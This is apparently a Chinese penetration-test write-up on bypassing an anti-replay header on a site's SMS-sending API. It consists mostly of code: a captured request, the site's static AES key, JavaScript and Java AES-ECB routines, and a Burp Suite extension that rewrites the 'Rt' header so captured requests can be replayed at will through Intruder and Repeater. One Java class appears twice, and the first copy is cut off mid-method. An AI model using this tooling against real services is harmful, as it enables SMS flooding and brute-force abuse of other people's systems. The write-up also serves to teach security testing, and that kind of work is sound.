1
前言
2
背景
3
收集信息
4
绕过防重放字段
POST /api/sms/sendsms HTTP/2
Host: xxx
Content-Length: 73
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer null
Rt: /5asJSe+gKXuuIdOsOg6kw==
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Api-Version: 1.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
{"phone":"1888888881","smsTypes":2,"uniqueId":"1684756825417","code":""}
// AES key embedded in the site's client-side script. 16 ASCII characters
// -> a 16-byte (AES-128) key once parsed as UTF-8. Because it is static and
// shipped to every client, anyone can mint a valid "Rt" value from it.
var aeskey2 = '1122334455667788';
xxxxx
/**
 * Build the value of the "Rt" request header: AES-ECB with PKCS#7 padding of
 * `data` under the static key `aeskey2`, returned as a string (CryptoJS's
 * default string form of the cipher result, i.e. Base64 of the ciphertext).
 *
 * Security note: ECB under a hard-coded client-side key offers no real
 * replay protection — the server can only verify that the value decrypts,
 * and every client is able to compute a fresh one at will.
 *
 * @param {string} data plaintext to encrypt (the site passes a timestamp-like value)
 * @returns {string} encrypted header value
 */
function encryptRt(data) {
  var keyWords = CryptoJS.enc.Utf8.parse(aeskey2);
  var cipherOptions = {
    mode: CryptoJS.mode.ECB,
    padding: CryptoJS.pad.Pkcs7
  };
  var cipherResult = CryptoJS.AES.encrypt(data, keyWords, cipherOptions);
  // Implicit string conversion yields the encoded ciphertext.
  return cipherResult + '';
}
xxx
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.security.Security;
import java.util.Base64;
public class AESUtils {
static {
// Registers BouncyCastle so the "PKCS7Padding" transformation name used below resolves;
// the stock JDK provider exposes the same 16-byte padding only under the name "PKCS5Padding".
Security.addProvider(new BouncyCastleProvider());
}
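/**
 * Decrypts a Base64-encoded AES-ECB ciphertext (as carried in the "Rt" header) with the
 * given key and returns the plaintext as UTF-8 text.
 *
 * NOTE(review): AES-ECB under a static key is reproduced here only to mimic the target
 * application's scheme; it is not a secure construction for anything new.
 *
 * @param data Base64 ciphertext
 * @param key  AES key as text; its UTF-8 encoding must be 16, 24 or 32 bytes
 * @return decrypted plaintext
 * @throws IllegalArgumentException if {@code data} or {@code key} is null/empty, the key is not
 *                                  a valid AES size, or {@code data} is not valid Base64
 * @throws Exception on JCA failures (e.g. bad padding when the key is wrong)
 */
public static String decryptData(String data, String key) throws Exception {
    if (data == null || data.isEmpty()) {
        throw new IllegalArgumentException("data must not be null or empty");
    }
    if (key == null) {
        throw new IllegalArgumentException("key must not be null");
    }
    byte[] keyBytes = key.getBytes("UTF-8");
    // Fail early with a clear message instead of an InvalidKeyException out of cipher.init().
    if (keyBytes.length != 16 && keyBytes.length != 24 && keyBytes.length != 32) {
        throw new IllegalArgumentException("AES key must be 16, 24 or 32 bytes, got " + keyBytes.length);
    }
    SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES");
    // "PKCS5Padding" is the JDK's name for PKCS#7 padding on 16-byte blocks: byte-for-byte the
    // same as BouncyCastle's "PKCS7Padding", but it also works without the extra provider.
    Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
    cipher.init(Cipher.DECRYPT_MODE, keySpec);
    byte[] decrypted = cipher.doFinal(Base64.getDecoder().decode(data));
    return new String(decrypted, "UTF-8");
}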
public static void main(String[] args) throws Exception {
String aesKey = "1122334455667788";
String data = "/5asJSe+gKXuuIdOsOg6kw==";
String decryptData = decryptData(data, aesKey);
System.out.println(decryptData);
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.security.Security;
import java.util.Base64;
public class AESUtils {
static {
// Registers BouncyCastle so the "PKCS7Padding" transformation name used below resolves;
// the stock JDK provider exposes the same 16-byte padding only under the name "PKCS5Padding".
Security.addProvider(new BouncyCastleProvider());
}
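/**
 * Encrypts UTF-8 text with AES-ECB and PKCS#7 padding under the given key and returns the
 * ciphertext Base64-encoded — the same transformation the site's encryptRt() JavaScript
 * applies to produce the "Rt" header value.
 *
 * NOTE(review): ECB under a static key is reproduced only to mimic the target; because the
 * output is deterministic (no IV) it must not be reused as a template for protecting anything.
 *
 * @param data plaintext (may be empty; it is padded to one block)
 * @param key  AES key as text; its UTF-8 encoding must be 16, 24 or 32 bytes
 * @return Base64 ciphertext
 * @throws IllegalArgumentException if {@code data} or {@code key} is null or the key is not
 *                                  a valid AES size
 * @throws Exception on JCA failures
 */
public static String encryptData(String data, String key) throws Exception {
    if (data == null) {
        throw new IllegalArgumentException("data must not be null");
    }
    if (key == null) {
        throw new IllegalArgumentException("key must not be null");
    }
    byte[] keyBytes = key.getBytes("UTF-8");
    // Fail early with a clear message instead of an InvalidKeyException out of cipher.init().
    if (keyBytes.length != 16 && keyBytes.length != 24 && keyBytes.length != 32) {
        throw new IllegalArgumentException("AES key must be 16, 24 or 32 bytes, got " + keyBytes.length);
    }
    SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES");
    // "PKCS5Padding" is the JDK's name for PKCS#7 padding on 16-byte blocks: byte-for-byte the
    // same as BouncyCastle's "PKCS7Padding", but it also works without the extra provider.
    Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
    cipher.init(Cipher.ENCRYPT_MODE, keySpec);
    byte[] encrypted = cipher.doFinal(data.getBytes("UTF-8"));
    return Base64.getEncoder().encodeToString(encrypted);
}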
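/**
 * Decrypts a Base64-encoded AES-ECB ciphertext (as carried in the "Rt" header) with the
 * given key and returns the plaintext as UTF-8 text.
 *
 * NOTE(review): AES-ECB under a static key is reproduced here only to mimic the target
 * application's scheme; it is not a secure construction for anything new.
 *
 * @param data Base64 ciphertext
 * @param key  AES key as text; its UTF-8 encoding must be 16, 24 or 32 bytes
 * @return decrypted plaintext
 * @throws IllegalArgumentException if {@code data} or {@code key} is null/empty, the key is not
 *                                  a valid AES size, or {@code data} is not valid Base64
 * @throws Exception on JCA failures (e.g. bad padding when the key is wrong)
 */
public static String decryptData(String data, String key) throws Exception {
    if (data == null || data.isEmpty()) {
        throw new IllegalArgumentException("data must not be null or empty");
    }
    if (key == null) {
        throw new IllegalArgumentException("key must not be null");
    }
    byte[] keyBytes = key.getBytes("UTF-8");
    // Fail early with a clear message instead of an InvalidKeyException out of cipher.init().
    if (keyBytes.length != 16 && keyBytes.length != 24 && keyBytes.length != 32) {
        throw new IllegalArgumentException("AES key must be 16, 24 or 32 bytes, got " + keyBytes.length);
    }
    SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES");
    // "PKCS5Padding" is the JDK's name for PKCS#7 padding on 16-byte blocks: byte-for-byte the
    // same as BouncyCastle's "PKCS7Padding", but it also works without the extra provider.
    Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
    cipher.init(Cipher.DECRYPT_MODE, keySpec);
    byte[] decrypted = cipher.doFinal(Base64.getDecoder().decode(data));
    return new String(decrypted, "UTF-8");
}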
5
封装插件,开始渗透
package burp;
import java.io.PrintWriter;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
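/**
 * Burp extension that re-mints the target's anti-replay header ("Rt") on outgoing requests
 * that already carry one, so captured requests can be replayed from Proxy, Scanner, Intruder
 * and Repeater without the server rejecting the stale value.
 *
 * The replacement is AES-ECB(current epoch time) under the static key the site ships in its
 * JavaScript; the encryption itself is delegated to ReplaceRt.encryptData (not part of this
 * listing). Requests without an Rt header, responses and other tools are left untouched.
 */
public class BurpExtender implements IBurpExtender, IHttpListener
{
    /** Header carrying the anti-replay token; matched as "Rt:" case-insensitively. */
    private static final String RT_HEADER = "Rt";
    /** Static AES key recovered from the client-side script. */
    private static final String AES_KEY = "1122334455667788";
    /** Tools whose requests are rewritten: Proxy (4), Scanner (16), Intruder (32), Repeater (64). */
    private static final int TOOL_MASK = IBurpExtenderCallbacks.TOOL_PROXY
            | IBurpExtenderCallbacks.TOOL_SCANNER
            | IBurpExtenderCallbacks.TOOL_INTRUDER
            | IBurpExtenderCallbacks.TOOL_REPEATER;

    private IBurpExtenderCallbacks callbacks;
    private IExtensionHelpers helpers;
    private PrintWriter stdout;
    private PrintWriter stderr;

    // implement IBurpExtender
    @Override
    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
    {
        this.callbacks = callbacks;
        this.helpers = callbacks.getHelpers();
        this.stdout = new PrintWriter(callbacks.getStdout(), true);
        this.stderr = new PrintWriter(callbacks.getStderr(), true);
        callbacks.setExtensionName("Rt_replace_Demo");
        callbacks.registerHttpListener(this);
    }

    /**
     * Replaces the Rt header of an outgoing request from one of the selected tools with a
     * freshly encrypted timestamp. Nothing is changed when the message is a response, comes
     * from another tool, or carries no Rt header.
     *
     * @param toolFlag         Burp tool that produced the message (a single TOOL_* flag)
     * @param messageIsRequest true for requests, false for responses
     * @param messageInfo      the message; its request bytes are replaced in place
     */
    @Override
    public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo)
    {
        if (!messageIsRequest || (toolFlag & TOOL_MASK) == 0) {
            return;
        }
        try {
            byte[] request = messageInfo.getRequest();
            IRequestInfo analyzeRequest = helpers.analyzeRequest(messageInfo);
            // Slice the body as raw bytes: getBodyOffset() is a byte offset, and a String round
            // trip through the platform charset would shift it (and corrupt the body) for
            // non-ASCII content.
            byte[] body = Arrays.copyOfRange(request, analyzeRequest.getBodyOffset(), request.length);

            // Rebuild the header list without the stale token instead of removing from the
            // list while iterating it. Match "Rt:" so a header merely starting with "Rt" is kept.
            List<String> headers = new ArrayList<String>();
            boolean hadRt = false;
            for (String header : analyzeRequest.getHeaders()) {
                if (header.regionMatches(true, 0, RT_HEADER + ":", 0, RT_HEADER.length() + 1)) {
                    hadRt = true;
                } else {
                    headers.add(header);
                }
            }
            if (!hadRt) {
                return; // not a request that uses the anti-replay header
            }

            // Epoch milliseconds (the original variable was misnamed "Seconds"); the captured
            // body's 13-digit uniqueId uses the same unit — TODO confirm the server expects millis.
            long nowMillis = System.currentTimeMillis();
            String rtHeader = RT_HEADER + ": " + ReplaceRt.encryptData(String.valueOf(nowMillis), AES_KEY);
            headers.add(rtHeader);

            messageInfo.setRequest(helpers.buildHttpMessage(headers, body));
            // Log only the header we changed; dumping every header would copy bearer tokens
            // and cookies into the extension output.
            stdout.println(rtHeader);
        } catch (Exception e) {
            stderr.println("Rt replacement failed: " + e);
        }
    }
}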
6
总结
前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放